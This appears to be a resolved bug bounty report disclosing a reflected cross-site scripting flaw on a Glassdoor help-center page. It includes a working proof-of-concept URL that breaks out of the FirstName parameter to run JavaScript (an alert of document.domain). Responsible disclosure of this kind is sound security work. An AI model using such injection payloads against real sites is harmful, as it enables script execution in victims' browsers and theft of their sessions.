Reflected XSS on https://help.glassdoor.com/GD_HC_EmbeddedChatVF
Medium
G
Glassdoor
Submitted None
Actions:
Reported by
l0cpd
Vulnerability Details
Technical details and impact analysis
Hi there,
I have found the xss vulnerability at: `https://help.glassdoor.com/GD_HC_EmbeddedChatVF`
**Browsers tested:** Firefox, Chrome, Edge (latest version)
## Steps To Reproduce:
Go to: `https://help.glassdoor.com/GD_HC_EmbeddedChatVF?FirstName=l0cpd%22};a=alert,b=document.domain,a(b)//`
## Supporting Material/References (screenshots, logs, videos):
{F1352792}
Regards,
@l0cpd
## Impact
The attacker can execute JS code.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected